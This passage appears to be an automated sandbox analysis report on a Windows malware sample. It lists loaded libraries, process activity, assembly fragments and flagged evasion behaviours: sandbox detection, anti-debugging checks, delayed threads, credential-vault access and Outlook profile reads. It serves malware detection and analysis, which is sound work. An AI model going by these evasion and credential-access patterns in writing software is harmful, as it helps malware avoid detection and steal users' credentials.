            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: ulib.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: ifsutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: devobj.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: p4LNUqyKZM.exeStatic file information: File size 1250816 > 1048576
            Source: p4LNUqyKZM.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: p4LNUqyKZM.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: p4LNUqyKZM.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: p4LNUqyKZM.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: p4LNUqyKZM.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: p4LNUqyKZM.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: p4LNUqyKZM.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: chkntfs.pdbGCTL source: svchost.exe, 00000001.00000002.1885469349.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1852804747.000000000341A000.00000004.00000020.00020000.00000000.sdmp, SCsLZYqthBle.exe, 00000002.00000002.3535610034.0000000000638000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: SCsLZYqthBle.exe, 00000002.00000002.3535229764.00000000001BE000.00000002.00000001.01000000.00000004.sdmp, SCsLZYqthBle.exe, 00000007.00000000.1955287762.00000000001BE000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: p4LNUqyKZM.exe, 00000000.00000003.1693769873.0000000003BD0000.00000004.00001000.00020000.00000000.sdmp, p4LNUqyKZM.exe, 00000000.00000003.1694275848.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1885612260.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1885612260.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1797175135.0000000003900000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1795600663.0000000003700000.00000004.00000020.00020000.00000000.sdmp, chkntfs.exe, 00000003.00000002.3536314646.000000000461E000.00000040.00001000.00020000.00000000.sdmp, chkntfs.exe, 00000003.00000002.3536314646.0000000004480000.00000040.00001000.00020000.00000000.sdmp, chkntfs.exe, 00000003.00000003.1885366615.000000000412D000.00000004.00000020.00020000.00000000.sdmp, chkntfs.exe, 00000003.00000003.1891266886.00000000042D6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: p4LNUqyKZM.exe, 00000000.00000003.1693769873.0000000003BD0000.00000004.00001000.00020000.00000000.sdmp, p4LNUqyKZM.exe, 00000000.00000003.1694275848.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.1885612260.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1885612260.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1797175135.0000000003900000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1795600663.0000000003700000.00000004.00000020.00020000.00000000.sdmp, chkntfs.exe, chkntfs.exe, 00000003.00000002.3536314646.000000000461E000.00000040.00001000.00020000.00000000.sdmp, chkntfs.exe, 00000003.00000002.3536314646.0000000004480000.00000040.00001000.00020000.00000000.sdmp, chkntfs.exe, 00000003.00000003.1885366615.000000000412D000.00000004.00000020.00020000.00000000.sdmp, chkntfs.exe, 00000003.00000003.1891266886.00000000042D6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: chkntfs.pdb source: svchost.exe, 00000001.00000002.1885469349.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1852804747.000000000341A000.00000004.00000020.00020000.00000000.sdmp, SCsLZYqthBle.exe, 00000002.00000002.3535610034.0000000000638000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: chkntfs.exe, 00000003.00000002.3536613638.0000000004AAC000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000003.00000002.3535509329.0000000000798000.00000004.00000020.00020000.00000000.sdmp, SCsLZYqthBle.exe, 00000007.00000000.1955867133.0000000002FDC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2174561801.00000000365AC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: chkntfs.exe, 00000003.00000002.3536613638.0000000004AAC000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000003.00000002.3535509329.0000000000798000.00000004.00000020.00020000.00000000.sdmp, SCsLZYqthBle.exe, 00000007.00000000.1955867133.0000000002FDC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2174561801.00000000365AC000.00000004.80000000.00040000.00000000.sdmp
            Source: p4LNUqyKZM.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: p4LNUqyKZM.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: p4LNUqyKZM.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: p4LNUqyKZM.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: p4LNUqyKZM.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeCode function: 0_2_009842DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_009842DE
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeCode function: 0_2_009A0A76 push ecx; ret 0_2_009A0A89
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041583A push 0000006Eh; ret 1_2_004158D8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004158B7 push 0000006Eh; ret 1_2_004158D8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00403400 push eax; ret 1_2_00403402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00405C1E push ebx; retf 1_2_00405C1F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B0225F pushad ; ret 1_2_03B027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B027FA pushad ; ret 1_2_03B027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B309AD push ecx; mov dword ptr [esp], ecx1_2_03B309B6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B0283D push eax; iretd 1_2_03B02858
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_044827FA pushad ; ret 3_2_044827F9
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_0448225F pushad ; ret 3_2_044827F9
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_0448283D push eax; iretd 3_2_04482858
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_044B09AD push ecx; mov dword ptr [esp], ecx3_2_044B09B6
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_004D2437 push 0000006Eh; ret 3_2_004D24D5
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_004D24B4 push 0000006Eh; ret 3_2_004D24D5
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_004C281B push ebx; retf 3_2_004C281C
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_004D510F pushfd ; retf 3_2_004D5128
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_004DF180 push 00000052h; retn F78Dh3_2_004DF226
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_004D5229 push ecx; ret 3_2_004D522E
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_004DB963 push esi; iretd 3_2_004DB964
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_042E142E push ebx; ret 3_2_042E142F
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_042D44A9 push edx; retf 3_2_042D44AA
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_042D34CE push ds; ret 3_2_042D34D4
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_042D55AE push ecx; iretd 3_2_042D55B0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_042DD619 push ebx; retf 3_2_042DD662
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_042D469E push ss; iretd 3_2_042D46A4
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_042D4694 push es; ret 3_2_042D469A
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_042E1732 push esi; ret 3_2_042E1733
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_042DC740 push edx; iretd 3_2_042DC741
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_042D6077 pushad ; iretd 3_2_042D6064
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_042E5172 push eax; ret 3_2_042E5174
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeCode function: 0_2_0099F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_0099F98E
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeCode function: 0_2_00A11C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00A11C41
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Found API chain indicative of sandbox detection
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeSandbox detection routine: GetForegroundWindow, DecisionNode, Sleepgraph_0-98807
            Switches to a custom stack to bypass stack traces
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeAPI/Special instruction interceptor: Address: 963254
            Source: C:\Windows\SysWOW64\chkntfs.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
            Source: C:\Windows\SysWOW64\chkntfs.exeAPI/Special instruction interceptor: Address: 7FFE2220D7E4
            Source: C:\Windows\SysWOW64\chkntfs.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
            Source: C:\Windows\SysWOW64\chkntfs.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
            Source: C:\Windows\SysWOW64\chkntfs.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
            Source: C:\Windows\SysWOW64\chkntfs.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
            Source: C:\Windows\SysWOW64\chkntfs.exeAPI/Special instruction interceptor: Address: 7FFE22210154
            Source: C:\Windows\SysWOW64\chkntfs.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B7096E rdtsc 1_2_03B7096E
            Source: C:\Windows\SysWOW64\chkntfs.exeWindow / User API: threadDelayed 2978Jump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeWindow / User API: threadDelayed 6994Jump to behavior
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeAPI coverage: 4.1 %
            Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
            Source: C:\Windows\SysWOW64\chkntfs.exeAPI coverage: 2.5 %
            Source: C:\Windows\SysWOW64\chkntfs.exe TID: 1196Thread sleep count: 2978 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exe TID: 1196Thread sleep time: -5956000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exe TID: 1196Thread sleep count: 6994 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exe TID: 1196Thread sleep time: -13988000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exe TID: 5448Thread sleep time: -60000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exe TID: 5448Thread sleep time: -34500s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exe TID: 5448Thread sleep count: 31 > 30Jump to behavior
            Source: C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exe TID: 5448Thread sleep time: -31000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\chkntfs.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeCode function: 0_2_009EDBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_009EDBBE
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeCode function: 0_2_009F68EE FindFirstFileW,FindClose,0_2_009F68EE
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeCode function: 0_2_009F698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_009F698F
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeCode function: 0_2_009ED076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_009ED076
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeCode function: 0_2_009ED3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_009ED3A9
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeCode function: 0_2_009F9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_009F9642
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeCode function: 0_2_009F979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_009F979D
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeCode function: 0_2_009F9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_009F9B2B
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeCode function: 0_2_009F5C97 FindFirstFileW,FindNextFileW,FindClose,0_2_009F5C97
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_004DC750 FindFirstFileW,FindNextFileW,FindClose,3_2_004DC750
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_004DC886 FindFirstFileW,FindNextFileW,FindClose,3_2_004DC886
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeCode function: 0_2_009842DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_009842DE
            Source: SCsLZYqthBle.exe, 00000007.00000002.3535916497.000000000128F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllk
            Source: chkntfs.exe, 00000003.00000002.3535509329.0000000000798000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: firefox.exe, 00000008.00000002.2175924850.00000265B64BC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllKK
            Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B7096E rdtsc 1_2_03B7096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00417A63 LdrLoadDll,1_2_00417A63
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeCode function: 0_2_009FEAA2 BlockInput,0_2_009FEAA2
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeCode function: 0_2_009B2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_009B2622
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeCode function: 0_2_009842DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_009842DE
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeCode function: 0_2_009A4CE8 mov eax, dword ptr fs:[00000030h]0_2_009A4CE8
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeCode function: 0_2_009634C0 mov eax, dword ptr fs:[00000030h]0_2_009634C0
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeCode function: 0_2_00963520 mov eax, dword ptr fs:[00000030h]0_2_00963520
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeCode function: 0_2_00961E70 mov eax, dword ptr fs:[00000030h]0_2_00961E70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B28397 mov eax, dword ptr fs:[00000030h]1_2_03B28397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B28397 mov eax, dword ptr fs:[00000030h]1_2_03B28397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B28397 mov eax, dword ptr fs:[00000030h]1_2_03B28397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B2E388 mov eax, dword ptr fs:[00000030h]1_2_03B2E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B2E388 mov eax, dword ptr fs:[00000030h]1_2_03B2E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B2E388 mov eax, dword ptr fs:[00000030h]1_2_03B2E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B5438F mov eax, dword ptr fs:[00000030h]1_2_03B5438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B5438F mov eax, dword ptr fs:[00000030h]1_2_03B5438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B4E3F0 mov eax, dword ptr fs:[00000030h]1_2_03B4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B4E3F0 mov eax, dword ptr fs:[00000030h]1_2_03B4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B4E3F0 mov eax, dword ptr fs:[00000030h]1_2_03B4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B663FF mov eax, dword ptr fs:[00000030h]1_2_03B663FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B403E9 mov eax, dword ptr fs:[00000030h]1_2_03B403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B403E9 mov eax, dword ptr fs:[00000030h]1_2_03B403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B403E9 mov eax, dword ptr fs:[00000030h]1_2_03B403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B403E9 mov eax, dword ptr fs:[00000030h]1_2_03B403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B403E9 mov eax, dword ptr fs:[00000030h]1_2_03B403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B403E9 mov eax, dword ptr fs:[00000030h]1_2_03B403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B403E9 mov eax, dword ptr fs:[00000030h]1_2_03B403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B403E9 mov eax, dword ptr fs:[00000030h]1_2_03B403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BDE3DB mov eax, dword ptr fs:[00000030h]1_2_03BDE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BDE3DB mov eax, dword ptr fs:[00000030h]1_2_03BDE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BDE3DB mov ecx, dword ptr fs:[00000030h]1_2_03BDE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BDE3DB mov eax, dword ptr fs:[00000030h]1_2_03BDE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BD43D4 mov eax, dword ptr fs:[00000030h]1_2_03BD43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BD43D4 mov eax, dword ptr fs:[00000030h]1_2_03BD43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BEC3CD mov eax, dword ptr fs:[00000030h]1_2_03BEC3CD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]1_2_03B3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]1_2_03B3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]1_2_03B3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]1_2_03B3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]1_2_03B3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]1_2_03B3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B383C0 mov eax, dword ptr fs:[00000030h]1_2_03B383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B383C0 mov eax, dword ptr fs:[00000030h]1_2_03B383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B383C0 mov eax, dword ptr fs:[00000030h]1_2_03B383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B383C0 mov eax, dword ptr fs:[00000030h]1_2_03B383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB63C0 mov eax, dword ptr fs:[00000030h]1_2_03BB63C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C0634F mov eax, dword ptr fs:[00000030h]1_2_03C0634F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B2C310 mov ecx, dword ptr fs:[00000030h]1_2_03B2C310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B50310 mov ecx, dword ptr fs:[00000030h]1_2_03B50310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6A30B mov eax, dword ptr fs:[00000030h]1_2_03B6A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6A30B mov eax, dword ptr fs:[00000030h]1_2_03B6A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6A30B mov eax, dword ptr fs:[00000030h]1_2_03B6A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BD437C mov eax, dword ptr fs:[00000030h]1_2_03BD437C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C08324 mov eax, dword ptr fs:[00000030h]1_2_03C08324
